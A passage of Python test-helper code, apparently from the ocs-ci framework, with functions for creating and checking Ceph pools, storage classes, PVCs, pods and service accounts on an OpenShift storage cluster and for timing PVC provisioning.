from ocs_ci.ocs.resources import pod, pvc
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.ocs.exceptions import CommandFailed, ResourceWrongStatusException
from ocs_ci.utility.retry import retry
from ocs_ci.utility.utils import TimeoutSampler, run_cmd
from ocs_ci.framework import config
logger = logging.getLogger(__name__)
def create_unique_resource_name(resource_description, resource_type):
    """
    Build a unique resource name from the type, the first 23 characters
    of the description and a random uuid4 hex suffix.

    Args:
        resource_description (str): The user provided object description
        resource_type (str): The type of object for which the unique name
            will be created. For example: project, pvc, etc

    Returns:
        str: A unique name

    """
    suffix = uuid4().hex
    return f"{resource_type}-{resource_description[:23]}-{suffix}"
def create_resource(do_reload=True, **kwargs):
    """
    Create an OCS resource from the given resource dictionary.

    Args:
        do_reload (bool): True for reloading the resource following its creation,
            False otherwise
        kwargs (dict): Dictionary of the OCS resource

    Returns:
        OCS: An OCS instance

    Raises:
        AssertionError: In case the resource creation failed

    """
    ocs_obj = OCS(**kwargs)
    name = kwargs.get('metadata').get('name')
    assert ocs_obj.create(do_reload=do_reload), (
        f"Failed to create resource {name}"
    )
    return ocs_obj
def wait_for_resource_state(resource, state, timeout=60):
    """
    Wait until a resource reaches the given status.

    Args:
        resource (OCS obj): The resource object
        state (str): The status to wait for
        timeout (int): Time in seconds to wait

    Raises:
        ResourceWrongStatusException: In case the resource hasn't
            reached the desired state within the timeout

    """
    try:
        resource.ocp.wait_for_resource(
            condition=state, resource_name=resource.name, timeout=timeout
        )
    except TimeoutExpiredError:
        logger.error(f"{resource.kind} {resource.name} failed to reach {state}")
        # Refresh resource data so describe() reflects the current state.
        resource.reload()
        raise ResourceWrongStatusException(resource.name, resource.describe())
    logger.info(f"{resource.kind} {resource.name} reached state {state}")
def create_pod(
    interface_type=None, pvc_name=None,
    do_reload=True, namespace=defaults.ROOK_CLUSTER_NAMESPACE,
    node_name=None, pod_dict_path=None, sa_name=None, dc_deployment=False,
    raw_block_pv=False, raw_block_device=constants.RAW_BLOCK_DEVICE, replica_count=1,
    pod_name=None
):
    """
    Create a pod (or a deploymentconfig when dc_deployment is True).

    Args:
        interface_type (str): The interface type (CephFS, RBD, etc.)
        pvc_name (str): The PVC that should be attached to the newly created pod
        do_reload (bool): True for reloading the object after creation, False otherwise
        namespace (str): The namespace for the new resource creation
        node_name (str): The name of specific node to schedule the pod
        pod_dict_path (str): YAML path for the pod
        sa_name (str): Serviceaccount name
        dc_deployment (bool): True if creating pod as deploymentconfig
        raw_block_pv (bool): True for creating raw block pv based pod, False otherwise
        raw_block_device (str): raw block device for the pod
        replica_count (int): Replica count for deployment config
        pod_name (str): Name of the pod to create

    Returns:
        Pod: A Pod instance. In the dc_deployment branch the deployment's pod is
            returned instead.
            NOTE(review): if no pod matching `pod_name` is found in the
            dc_deployment branch the function implicitly returns None --
            confirm callers handle this.

    Raises:
        AssertionError: In case of any failure
    """
    # Pick the pod template matching the interface; an explicit pod_dict_path wins.
    if interface_type == constants.CEPHBLOCKPOOL:
        pod_dict = pod_dict_path if pod_dict_path else constants.CSI_RBD_POD_YAML
        interface = constants.RBD_INTERFACE
    else:
        pod_dict = pod_dict_path if pod_dict_path else constants.CSI_CEPHFS_POD_YAML
        interface = constants.CEPHFS_INTERFACE
    # A deploymentconfig uses its own template regardless of interface.
    if dc_deployment:
        pod_dict = pod_dict_path if pod_dict_path else constants.FEDORA_DC_YAML
    pod_data = templating.load_yaml(pod_dict)
    if not pod_name:
        pod_name = create_unique_resource_name(
            f'test-{interface}', 'pod'
        )
    pod_data['metadata']['name'] = pod_name
    pod_data['metadata']['namespace'] = namespace
    if dc_deployment:
        # Deploymentconfig templates carry the pod spec one level deeper.
        pod_data['metadata']['labels']['app'] = pod_name
        pod_data['spec']['template']['metadata']['labels']['name'] = pod_name
        pod_data['spec']['replicas'] = replica_count
    if pvc_name:
        if dc_deployment:
            pod_data['spec']['template']['spec']['volumes'][0][
                'persistentVolumeClaim'
            ]['claimName'] = pvc_name
        else:
            pod_data['spec']['volumes'][0]['persistentVolumeClaim']['claimName'] = pvc_name
    if interface_type == constants.CEPHBLOCKPOOL and raw_block_pv:
        # Raw-block PVs are attached as volumeDevices rather than volumeMounts.
        pod_data['spec']['containers'][0]['volumeDevices'][0]['devicePath'] = raw_block_device
        pod_data['spec']['containers'][0]['volumeDevices'][0]['name'] = pod_data.get('spec').get('volumes')[
            0].get('name')
    if node_name:
        pod_data['spec']['nodeName'] = node_name
    else:
        # Drop any nodeName pinned in the template so the scheduler decides.
        if 'nodeName' in pod_data.get('spec'):
            del pod_data['spec']['nodeName']
    if sa_name and dc_deployment:
        pod_data['spec']['template']['spec']['serviceAccountName'] = sa_name
    if dc_deployment:
        ocs_obj = create_resource(**pod_data)
        logger.info(ocs_obj.name)
        # Wait for the deployer pod (<name>-1-deploy) to complete.
        assert (ocp.OCP(kind='pod', namespace=namespace)).wait_for_resource(
            condition=constants.STATUS_COMPLETED,
            resource_name=pod_name + '-1-deploy',
            resource_count=0, timeout=180, sleep=3
        )
        # Return the deployed pod, skipping the deployer pod itself.
        dpod_list = pod.get_all_pods(namespace=namespace)
        for dpod in dpod_list:
            if '-1-deploy' not in dpod.name:
                if pod_name in dpod.name:
                    return dpod
    else:
        pod_obj = pod.Pod(**pod_data)
        pod_name = pod_data.get('metadata').get('name')
        logger.info(f'Creating new Pod {pod_name} for test')
        created_resource = pod_obj.create(do_reload=do_reload)
        assert created_resource, (
            f"Failed to create Pod {pod_name}"
        )
        return pod_obj
def create_project():
    """
    Create a project (namespace) with a unique generated name.

    Returns:
        OCP: Project object

    Raises:
        AssertionError: If the project creation failed

    """
    project_name = create_unique_resource_name('test', 'namespace')
    project_obj = ocp.OCP(kind='Project', namespace=project_name)
    assert project_obj.new_project(project_name), (
        f"Failed to create namespace {project_name}"
    )
    return project_obj
def create_multilpe_projects(number_of_project):
    """
    Create one or more projects.

    NOTE: the misspelling in this function's name is kept for backward
    compatibility with existing callers.

    Args:
        number_of_project (int): Number of projects to be created

    Returns:
        list: List of project objects

    """
    return [create_project() for _ in range(number_of_project)]
def create_secret(interface_type):
    """
    Create a secret for the given CSI interface.

    Args:
        interface_type (str): The type of the interface
            (e.g. CephBlockPool, CephFileSystem)

    Returns:
        OCS: An OCS instance for the secret

    NOTE(review): if interface_type is neither CEPHBLOCKPOOL nor
    CEPHFILESYSTEM, `interface` is never assigned and the f-string below
    raises NameError -- confirm callers only pass the two supported types.
    """
    secret_data = dict()
    if interface_type == constants.CEPHBLOCKPOOL:
        secret_data = templating.load_yaml(
            constants.CSI_RBD_SECRET_YAML
        )
        # RBD secrets authenticate with the admin user/key.
        secret_data['stringData']['userID'] = constants.ADMIN_USER
        secret_data['stringData']['userKey'] = get_admin_key()
        interface = constants.RBD_INTERFACE
    elif interface_type == constants.CEPHFILESYSTEM:
        secret_data = templating.load_yaml(
            constants.CSI_CEPHFS_SECRET_YAML
        )
        # CephFS secrets use admin* keys instead of user* keys.
        del secret_data['stringData']['userID']
        del secret_data['stringData']['userKey']
        secret_data['stringData']['adminID'] = constants.ADMIN_USER
        secret_data['stringData']['adminKey'] = get_admin_key()
        interface = constants.CEPHFS_INTERFACE
    secret_data['metadata']['name'] = create_unique_resource_name(
        f'test-{interface}', 'secret'
    )
    secret_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
    return create_resource(**secret_data)
def create_ceph_block_pool(pool_name=None):
    """
    Create a Ceph block pool and verify it exists.

    Args:
        pool_name (str): The pool name to create; a unique name is
            generated when not provided

    Returns:
        OCS: An OCS instance for the Ceph block pool

    Raises:
        AssertionError: If the pool is not found after creation

    """
    cbp_data = templating.load_yaml(constants.CEPHBLOCKPOOL_YAML)
    if not pool_name:
        pool_name = create_unique_resource_name('test', 'cbp')
    cbp_data['metadata']['name'] = pool_name
    cbp_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
    # Match the failure domain of the running cluster topology.
    cbp_data['spec']['failureDomain'] = get_failure_domin()
    cbp_obj = create_resource(**cbp_data)
    cbp_obj.reload()
    assert verify_block_pool_exists(cbp_obj.name), (
        f"Block pool {cbp_obj.name} does not exist"
    )
    return cbp_obj
def create_ceph_file_system(pool_name=None):
    """
    Create a Ceph file system and verify it exists.

    Args:
        pool_name (str): The file system name to create; a unique name is
            generated when not provided

    Returns:
        OCS: An OCS instance for the Ceph file system

    Raises:
        AssertionError: If the file system is not validated after creation

    """
    cfs_data = templating.load_yaml(constants.CEPHFILESYSTEM_YAML)
    if not pool_name:
        pool_name = create_unique_resource_name('test', 'cfs')
    cfs_data['metadata']['name'] = pool_name
    cfs_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
    # Use a distinct name for the created object instead of reusing the dict.
    cfs_obj = create_resource(**cfs_data)
    cfs_obj.reload()
    assert validate_cephfilesystem(cfs_obj.name), (
        f"File system {cfs_obj.name} does not exist"
    )
    return cfs_obj
def create_storage_class(
    interface_type, interface_name, secret_name,
    reclaim_policy=constants.RECLAIM_POLICY_DELETE, sc_name=None,
    provisioner=None
):
    """
    Create a CSI storage class for the given interface.

    Args:
        interface_type (str): The type of the interface
            (e.g. CephBlockPool, CephFileSystem)
        interface_name (str): The name of the interface (used as the pool)
        secret_name (str): The name of the secret
        sc_name (str): The name of storage class to create
        reclaim_policy (str): Type of reclaim policy. Defaults to 'Delete'
            (eg., 'Delete', 'Retain')
        provisioner (str): Provisioner name; defaults to the RBD/CephFS
            provisioner matching the interface

    Returns:
        OCS: An OCS instance for the storage class

    NOTE(review): if interface_type matches neither supported constant,
    `interface` and `sc_data` fields are never set and the code below
    raises -- confirm callers only pass the two supported types.
    """
    sc_data = dict()
    if interface_type == constants.CEPHBLOCKPOOL:
        sc_data = templating.load_yaml(
            constants.CSI_RBD_STORAGECLASS_YAML
        )
        # node-stage secret is used by the kubelet when staging the volume
        sc_data['parameters'][
            'csi.storage.k8s.io/node-stage-secret-name'
        ] = secret_name
        sc_data['parameters'][
            'csi.storage.k8s.io/node-stage-secret-namespace'
        ] = defaults.ROOK_CLUSTER_NAMESPACE
        interface = constants.RBD_INTERFACE
        sc_data['provisioner'] = (
            provisioner if provisioner else defaults.RBD_PROVISIONER
        )
    elif interface_type == constants.CEPHFILESYSTEM:
        sc_data = templating.load_yaml(
            constants.CSI_CEPHFS_STORAGECLASS_YAML
        )
        sc_data['parameters'][
            'csi.storage.k8s.io/node-stage-secret-name'
        ] = secret_name
        sc_data['parameters'][
            'csi.storage.k8s.io/node-stage-secret-namespace'
        ] = defaults.ROOK_CLUSTER_NAMESPACE
        interface = constants.CEPHFS_INTERFACE
        # CephFS storage classes also need the filesystem name.
        sc_data['parameters']['fsName'] = get_cephfs_name()
        sc_data['provisioner'] = (
            provisioner if provisioner else defaults.CEPHFS_PROVISIONER
        )
    sc_data['parameters']['pool'] = interface_name
    sc_data['metadata']['name'] = (
        sc_name if sc_name else create_unique_resource_name(
            f'test-{interface}', 'storageclass'
        )
    )
    sc_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
    # provisioner secret is used while creating/deleting volumes
    sc_data['parameters'][
        'csi.storage.k8s.io/provisioner-secret-name'
    ] = secret_name
    sc_data['parameters'][
        'csi.storage.k8s.io/provisioner-secret-namespace'
    ] = defaults.ROOK_CLUSTER_NAMESPACE
    sc_data['parameters']['clusterID'] = defaults.ROOK_CLUSTER_NAMESPACE
    sc_data['reclaimPolicy'] = reclaim_policy
    # Older templates may carry a stale 'userid' parameter; drop it if present.
    try:
        del sc_data['parameters']['userid']
    except KeyError:
        pass
    return create_resource(**sc_data)
def create_pvc(
    sc_name, pvc_name=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE,
    size=None, do_reload=True, access_mode=constants.ACCESS_MODE_RWO,
    volume_mode=None
):
    """
    Create a PVC.

    Args:
        sc_name (str): The name of the storage class for the PVC to be
            associated with
        pvc_name (str): The name of the PVC to create; generated when omitted
        namespace (str): The namespace for the PVC creation
        size (str): Size of pvc to create
        do_reload (bool): True for wait for reloading PVC after its creation, False otherwise
        access_mode (str): The access mode to be used for the PVC
        volume_mode (str): Volume mode for rbd RWX pvc i.e. 'Block'

    Returns:
        PVC: PVC instance

    Raises:
        AssertionError: If the PVC creation failed

    """
    pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
    chosen_name = pvc_name or create_unique_resource_name('test', 'pvc')
    pvc_data['metadata']['name'] = chosen_name
    pvc_data['metadata']['namespace'] = namespace
    pvc_data['spec']['accessModes'] = [access_mode]
    pvc_data['spec']['storageClassName'] = sc_name
    if size:
        pvc_data['spec']['resources']['requests']['storage'] = size
    if volume_mode:
        pvc_data['spec']['volumeMode'] = volume_mode
    ocs_obj = pvc.PVC(**pvc_data)
    created_pvc = ocs_obj.create(do_reload=do_reload)
    assert created_pvc, f"Failed to create resource {pvc_name}"
    return ocs_obj
def create_multiple_pvcs(
    sc_name, namespace, number_of_pvc=1, size=None, do_reload=False,
    access_mode=constants.ACCESS_MODE_RWO
):
    """
    Create one or more PVCs.

    Args:
        sc_name (str): The name of the storage class to provision the PVCs from
        namespace (str): The namespace for the PVCs creation
        number_of_pvc (int): Number of PVCs to be created
        size (str): The size of the PVCs to create
        do_reload (bool): True for wait for reloading PVC after its creation,
            False otherwise
        access_mode (str): The kind of access mode for PVC

    Returns:
        list: List of PVC objects

    """
    # RWX on an RBD storage class requires a raw-block PVC.
    use_block = access_mode == 'ReadWriteMany' and 'rbd' in sc_name
    volume_mode = 'Block' if use_block else None
    pvc_objs = []
    for _ in range(number_of_pvc):
        pvc_objs.append(
            create_pvc(
                sc_name=sc_name, size=size, namespace=namespace,
                do_reload=do_reload, access_mode=access_mode,
                volume_mode=volume_mode
            )
        )
    return pvc_objs
def verify_block_pool_exists(pool_name):
    """
    Check whether a Ceph block pool exists, polling for up to a minute.

    Args:
        pool_name (str): The name of the Ceph block pool

    Returns:
        bool: True if the Ceph block pool exists, False otherwise

    """
    logger.info(f"Verifying that block pool {pool_name} exists")
    ct_pod = pod.get_ceph_tools_pod()
    try:
        for pools in TimeoutSampler(
            60, 3, ct_pod.exec_ceph_cmd, 'ceph osd lspools'
        ):
            logger.info(f'POOLS are {pools}')
            if any(pool_name in entry.get('poolname') for entry in pools):
                return True
    except TimeoutExpiredError:
        return False
def get_admin_key():
    """
    Fetch the admin key secret from Ceph.

    Returns:
        str: The admin key

    """
    tools_pod = pod.get_ceph_tools_pod()
    auth_info = tools_pod.exec_ceph_cmd('ceph auth get-key client.admin')
    return auth_info['key']
def get_cephfs_data_pool_name():
    """
    Fetch the CephFS data pool name from Ceph.

    Returns:
        str: fs datapool name

    """
    tools_pod = pod.get_ceph_tools_pod()
    fs_info = tools_pod.exec_ceph_cmd('ceph fs ls')
    return fs_info[0]['data_pools'][0]
def validate_cephfilesystem(fs_name):
    """
    Verify a CephFileSystem exists on both the Ceph and OCP sides.

    Args:
        fs_name (str): The name of the Ceph FileSystem

    Returns:
        bool: True if CephFileSystem is created at Ceph and OCP side else
            will return False with valid msg i.e Failure cause

    """
    cfs = ocp.OCP(
        kind=constants.CEPHFILESYSTEM,
        namespace=defaults.ROOK_CLUSTER_NAMESPACE
    )
    ct_pod = pod.get_ceph_tools_pod()
    ceph_validate = False
    ocp_validate = False
    # OCP-side check: the CephFileSystem CR must exist.
    result = cfs.get(resource_name=fs_name)
    if result.get('metadata').get('name'):
        logger.info("Filesystem %s got created from Openshift Side", fs_name)
        ocp_validate = True
    else:
        logger.info(
            "Filesystem %s was not create at Openshift Side", fs_name
        )
        return False
    # Ceph-side check: poll `ceph fs ls` (up to 60s, every 3s) for the name.
    try:
        for pools in TimeoutSampler(
            60, 3, ct_pod.exec_ceph_cmd, 'ceph fs ls'
        ):
            for out in pools:
                result = out.get('name')
                if result == fs_name:
                    logger.info("FileSystem %s got created from Ceph Side", fs_name)
                    ceph_validate = True
                    break
                else:
                    logger.error("FileSystem %s was not present at Ceph Side", fs_name)
                    ceph_validate = False
            if ceph_validate:
                # Found on Ceph side -- stop polling.
                break
    except TimeoutExpiredError:
        # Polling timed out; ceph_validate stays False and the final
        # expression below returns False.
        pass
    return True if (ceph_validate and ocp_validate) else False
def get_all_storageclass_names():
    """
    Get the names of all storageclasses, excluding the gp2 and flex ones.

    Returns:
        list: list of storageclass names

    """
    sc_obj = ocp.OCP(
        kind=constants.STORAGECLASS,
        namespace=defaults.ROOK_CLUSTER_NAMESPACE
    )
    items = sc_obj.get()['items']
    names = []
    for item in items:
        name = item.get('metadata').get('name')
        # Skip the platform default storage classes.
        if name in constants.IGNORE_SC_GP2 or name in constants.IGNORE_SC_FLEX:
            continue
        names.append(name)
    return names
def delete_storageclasses(sc_objs):
    """
    Delete the given storageclasses.

    Args:
        sc_objs (list): List of SC objects for deletion

    Returns:
        bool: True if deletion is successful

    """
    for sc_obj in sc_objs:
        logger.info("Deleting StorageClass with name %s", sc_obj.name)
        sc_obj.delete()
    return True
def get_cephblockpool_names():
    """
    Get the names of all CephBlockPools.

    Returns:
        list: list of cephblockpool names

    """
    pool_obj = ocp.OCP(
        kind=constants.CEPHBLOCKPOOL,
        namespace=defaults.ROOK_CLUSTER_NAMESPACE
    )
    pool_items = pool_obj.get()['items']
    return [entry.get('metadata').get('name') for entry in pool_items]
def delete_cephblockpools(cbp_objs):
    """
    Delete the given CephBlockPools.

    Args:
        cbp_objs (list): List of CBP objects for deletion

    Returns:
        bool: True if deletion of CephBlockPool is successful

    """
    for cbp_obj in cbp_objs:
        logger.info("Deleting CephBlockPool with name %s", cbp_obj.name)
        cbp_obj.delete()
    return True
def get_cephfs_name():
    """
    Retrieve the name of the (first) CephFS filesystem.

    Returns:
        str: Name of CFS

    """
    cfs_obj = ocp.OCP(
        kind=constants.CEPHFILESYSTEM,
        namespace=defaults.ROOK_CLUSTER_NAMESPACE
    )
    first_item = cfs_obj.get()['items'][0]
    return first_item.get('metadata').get('name')
def run_io_with_rados_bench(**kw):
    """
    Run a radosbench task.

    Runs the radosbench command on a specified pod. If parameters are
    not provided the task assumes a few default parameters. This task
    runs the command in synchronous fashion.

    Args:
        **kw: Needs a dictionary of various radosbench parameters.
            ex: pool_name:pool
                pg_num:number of pgs for pool
                op: type of operation {read, write}
                cleanup: True OR False

    Returns:
        ret: return value of radosbench command, or False on failure
    """
    logger.info("Running radosbench task")
    ceph_pods = kw.get('ceph_pods')  # list of pod objects of ceph cluster
    # NOTE: local name must not shadow the module-level
    # `from ocs_ci.framework import config` import.
    bench_config = kw.get('config')
    role = bench_config.get('role', 'client')
    clients = [cpod for cpod in ceph_pods if role in cpod.roles]
    idx = bench_config.get('idx', 0)
    client = clients[idx]
    op = bench_config.get('op', 'write')
    # bool indexing: True -> '--cleanup', False -> '--no-cleanup'
    cleanup = ['--no-cleanup', '--cleanup'][bench_config.get('cleanup', True)]
    pool = bench_config.get('pool')
    block = str(bench_config.get('size', 4 << 20))
    # `duration` avoids shadowing the imported `time` module.
    duration = str(bench_config.get('time', 120))
    rados_bench = (
        f"rados --no-log-to-stderr "
        f"-b {block} "
        f"-p {pool} "
        f"bench "
        f"{duration} "
        f"{op} "
        f"{cleanup} "
    )
    try:
        ret = client.exec_ceph_cmd(ceph_cmd=rados_bench)
    except CommandFailed as ex:
        logger.error(f"Rados bench failed\n Error is: {ex}")
        return False
    logger.info(ret)
    logger.info("Finished radosbench")
    return ret
def get_all_pvs():
    """
    Get all PVs in the openshift-storage namespace.

    Returns:
        dict: Dict of all pv in openshift-storage namespace

    """
    ocp_pv_obj = ocp.OCP(
        kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE
    )
    return ocp_pv_obj.get()
# TODO: revert counts of tries and delay,BZ 1726266
@retry(AssertionError, tries=20, delay=10, backoff=1)
def validate_pv_delete(pv_name):
    """
    Validate that a PV was deleted after its PVC deletion, retrying via
    the decorator until the PV is gone.

    Args:
        pv_name (str): pv from pvc to validate

    Returns:
        bool: True if deletion is successful

    Raises:
        AssertionError: If the pv is not deleted (triggers a retry)

    """
    ocp_pv_obj = ocp.OCP(
        kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE
    )
    try:
        pv_info = ocp_pv_obj.get(resource_name=pv_name)
    except CommandFailed:
        # `oc get` fails when the PV no longer exists -- that is success here.
        return True
    if pv_info:
        raise AssertionError(
            f"{constants.PV} {pv_name} is not deleted after PVC deletion"
        )
def create_pods(pvc_objs_list, interface_type=None, namespace=None):
    """
    Create one pod per PVC in 'pvc_objs_list'.

    Args:
        pvc_objs_list (list): List of PVC objects
        interface_type (str): The interface type (CephFS, Cephblockpool, etc.)
        namespace (str): Name of the namespace

    Returns:
        list: List of Pod objects

    """
    pods_created = []
    for pvc_obj in pvc_objs_list:
        pods_created.append(
            create_pod(
                interface_type=interface_type, pvc_name=pvc_obj.name,
                do_reload=False, namespace=namespace
            )
        )
    return pods_created
def get_worker_nodes():
    """
    Fetch the names of all worker nodes.

    Returns:
        list: List of names of worker nodes

    """
    ocp_node_obj = ocp.OCP(kind=constants.NODE)
    nodes = ocp_node_obj.get(
        selector='node-role.kubernetes.io/worker'
    ).get('items')
    return [node.get('metadata').get('name') for node in nodes]
def get_master_nodes():
    """
    Fetch the names of all master nodes.

    Returns:
        list: List of names of master nodes

    """
    ocp_node_obj = ocp.OCP(kind=constants.NODE)
    nodes = ocp_node_obj.get(
        selector='node-role.kubernetes.io/master'
    ).get('items')
    return [node.get('metadata').get('name') for node in nodes]
def get_start_creation_time(interface, pvc_name):
    """
    Get the starting creation time of a PVC based on provisioner logs.

    Args:
        interface (str): The interface backed the PVC
        pvc_name (str): Name of the PVC for creation time measurement

    Returns:
        datetime object: Start time of PVC creation

    Raises:
        IndexError: If no 'provision ... started' log line matches the PVC
    """
    # Renamed from `format`: don't shadow the builtin.
    time_format = '%H:%M:%S.%f'
    # Get the correct provisioner pod based on the interface
    if interface == constants.CEPHBLOCKPOOL:
        pod_name = pod.get_rbd_provisioner_pod().name
    else:
        pod_name = pod.get_cephfs_provisioner_pod().name
    # get the logs from the csi-provisioner container
    logs = pod.get_pod_logs(pod_name, 'csi-provisioner')
    logs = logs.split("\n")
    # Extract the starting time for the PVC provisioning
    start = [
        i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)
    ]
    start = start[0].split(' ')[1]
    return datetime.datetime.strptime(start, time_format)
def get_end_creation_time(interface, pvc_name):
    """
    Get the ending creation time of a PVC based on provisioner logs.

    Args:
        interface (str): The interface backed the PVC
        pvc_name (str): Name of the PVC for creation time measurement

    Returns:
        datetime object: End time of PVC creation

    Raises:
        IndexError: If no 'provision ... succeeded' log line matches the PVC
    """
    # Renamed from `format`: don't shadow the builtin.
    time_format = '%H:%M:%S.%f'
    # Get the correct provisioner pod based on the interface
    if interface == constants.CEPHBLOCKPOOL:
        pod_name = pod.get_rbd_provisioner_pod().name
    else:
        pod_name = pod.get_cephfs_provisioner_pod().name
    # get the logs from the csi-provisioner container
    logs = pod.get_pod_logs(pod_name, 'csi-provisioner')
    logs = logs.split("\n")
    # Extract the ending time for the PVC provisioning
    end = [
        i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)
    ]
    end = end[0].split(' ')[1]
    return datetime.datetime.strptime(end, time_format)
def measure_pvc_creation_time(interface, pvc_name):
    """
    Measure PVC creation time based on provisioner logs.

    Args:
        interface (str): The interface backed the PVC
        pvc_name (str): Name of the PVC for creation time measurement

    Returns:
        float: Creation time for the PVC in seconds

    """
    start_time = get_start_creation_time(interface=interface, pvc_name=pvc_name)
    end_time = get_end_creation_time(interface=interface, pvc_name=pvc_name)
    return (end_time - start_time).total_seconds()
def get_default_storage_class():
    """
    Get the default StorageClass(es).

    Returns:
        list: names of StorageClasses annotated as the default class

    """
    sc_ocp_obj = ocp.OCP(kind='StorageClass')
    default_names = []
    for sc in sc_ocp_obj.get().get('items'):
        metadata = sc.get('metadata')
        # Only annotated storage classes can carry the default-class marker.
        if 'annotations' not in metadata:
            continue
        annotations = metadata.get('annotations')
        if annotations.get('storageclass.kubernetes.io/is-default-class') == 'true':
            default_names.append(metadata.get('name'))
    return default_names
def change_default_storageclass(scname):
    """
    Change the default StorageClass to the given SC name.

    Args:
        scname (str): StorageClass name

    Returns:
        bool: True on success
    """
    # Shared patch template; %s is the is-default-class value.
    annotation_patch = (
        " '{\"metadata\": {\"annotations\":"
        "{\"storageclass.kubernetes.io/is-default-class\""
        ":\"%s\"}}}' "
    )
    ocp_obj = ocp.OCP(kind='StorageClass')
    default_sc = get_default_storage_class()
    # BUG FIX: get_default_storage_class() returns a LIST of names; the old
    # code interpolated the list itself into the `oc patch` command, producing
    # an invalid resource name like "['gp2']". Patch each entry individually.
    for current_default in default_sc:
        # Demote the currently-default StorageClass.
        patch_cmd = (
            f"patch storageclass {current_default} -p"
            + annotation_patch % 'false'
        )
        ocp_obj.exec_oc_cmd(command=patch_cmd)
    # Promote the requested StorageClass to default.
    patch_cmd = f"patch storageclass {scname} -p" + annotation_patch % 'true'
    ocp_obj.exec_oc_cmd(command=patch_cmd)
    return True
def verify_volume_deleted_in_backend(interface, image_uuid, pool_name=None):
    """
    Verify that Image/Subvolume is not present in the backend.

    Args:
        interface (str): The interface backed the PVC
        image_uuid (str): Part of VolID which represents
            corresponding image/subvolume in backend
            eg: oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'
            Output is the CSI generated VolID and looks like:
            '0001-000c-rook-cluster-0000000000000001-
            f301898c-a192-11e9-852a-1eeeb6975c91' where
            image_uuid is 'f301898c-a192-11e9-852a-1eeeb6975c91'
        pool_name (str): Name of the rbd-pool if interface is CephBlockPool

    Returns:
        bool: True if volume is not present. False if volume is present

    NOTE(review): if interface matches neither constant, `cmd` and
    `valid_error` are never assigned and the code below raises NameError --
    confirm callers only pass the two supported interfaces.
    """
    ct_pod = pod.get_ceph_tools_pod()
    if interface == constants.CEPHBLOCKPOOL:
        # rbd info fails with this error when the image is gone.
        valid_error = f"error opening image csi-vol-{image_uuid}"
        cmd = f"rbd info -p {pool_name} csi-vol-{image_uuid}"
    if interface == constants.CEPHFILESYSTEM:
        # subvolume getpath fails with this error when the subvolume is gone.
        valid_error = f"Subvolume 'csi-vol-{image_uuid}' not found"
        cmd = (
            f"ceph fs subvolume getpath {defaults.CEPHFILESYSTEM_NAME}"
            f" csi-vol-{image_uuid} csi"
        )
    try:
        # If the command succeeds, the volume still exists in the backend.
        ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format='json')
        return False
    except CommandFailed as ecf:
        # Only the expected "not found" error counts as deleted.
        assert valid_error in str(ecf), (
            f"Error occurred while verifying volume is deleted in backend: "
            f"{str(ecf)} ImageUUID: {image_uuid}. Interface type: {interface}"
        )
    logger.info(
        f"Verified: Volume corresponding to uuid {image_uuid} is deleted "
        f"in backend"
    )
    return True
def create_serviceaccount(namespace):
    """
    Create a ServiceAccount with a unique generated name.

    Args:
        namespace (str): The namespace for the serviceaccount creation

    Returns:
        OCS: An OCS instance for the service_account

    """
    sa_data = templating.load_yaml(constants.SERVICE_ACCOUNT_YAML)
    sa_data['metadata']['name'] = create_unique_resource_name(
        'sa', 'serviceaccount'
    )
    sa_data['metadata']['namespace'] = namespace
    return create_resource(**sa_data)
def get_serviceaccount_obj(sa_name, namespace):
    """
    Get a serviceaccount object.

    Args:
        sa_name (str): Service Account name
        namespace (str): The namespace to look the serviceaccount up in

    Returns:
        OCS: An OCS instance for the service_account, or None when the
            lookup failed

    """
    ocp_sa_obj = ocp.OCP(kind=constants.SERVICE_ACCOUNT, namespace=namespace)
    try:
        return OCS(**ocp_sa_obj.get(resource_name=sa_name))
    except CommandFailed:
        logger.error("ServiceAccount not found in specified namespace")
def validate_scc_policy(sa_name, namespace):
    """
    Validate that a serviceaccount is listed in the privileged SCC.

    Args:
        sa_name (str): Service Account name
        namespace (str): The namespace of the serviceaccount

    Returns:
        bool: True if the serviceaccount is present in the privileged SCC
            users list, else False

    """
    scc_user = f"system:serviceaccount:{namespace}:{sa_name}"
    logger.info(scc_user)
    ocp_scc_obj = ocp.OCP(kind=constants.SCC, namespace=namespace)
    scc_dict = ocp_scc_obj.get(resource_name=constants.PRIVILEGED)
    return scc_user in scc_dict.get('users')
def add_scc_policy(sa_name, namespace):
    """
    Add a ServiceAccount to the privileged SCC.

    Args:
        sa_name (str): ServiceAccount name
        namespace (str): The namespace for the scc_policy creation
    """
    # Renamed from `ocp`: the old local shadowed the imported
    # `ocs_ci.ocs.ocp` module used throughout this file.
    ocp_obj = OCP()
    out = ocp_obj.exec_oc_cmd(
        command=f"adm policy add-scc-to-user privileged system:serviceaccount:{namespace}:{sa_name}",
        out_yaml_format=False
    )
    logger.info(out)
def remove_scc_policy(sa_name, namespace):
    """
    Remove a ServiceAccount from the privileged SCC.

    Args:
        sa_name (str): ServiceAccount name
        namespace (str): The namespace for the scc_policy deletion
    """
    # Renamed from `ocp`: the old local shadowed the imported
    # `ocs_ci.ocs.ocp` module used throughout this file.
    ocp_obj = OCP()
    out = ocp_obj.exec_oc_cmd(
        command=f"adm policy remove-scc-from-user privileged system:serviceaccount:{namespace}:{sa_name}",
        out_yaml_format=False
    )
    logger.info(out)
def delete_deploymentconfig(pod_obj):
    """
    Delete the deploymentconfig backing the given pod and wait for its
    removal.

    Args:
        pod_obj (object): Pod object

    """
    # Look the dc name up once instead of per call.
    dc_name = pod_obj.get_labels().get('name')
    dc_ocp_obj = ocp.OCP(kind=constants.DEPLOYMENTCONFIG)
    dc_ocp_obj.delete(resource_name=dc_name)
    dc_ocp_obj.wait_for_delete(resource_name=dc_name)
def craft_s3_command(mcg_obj, cmd):
    """
    Craft the AWS CLI S3 command, including the login credentials when an
    MCG object is provided.

    Args:
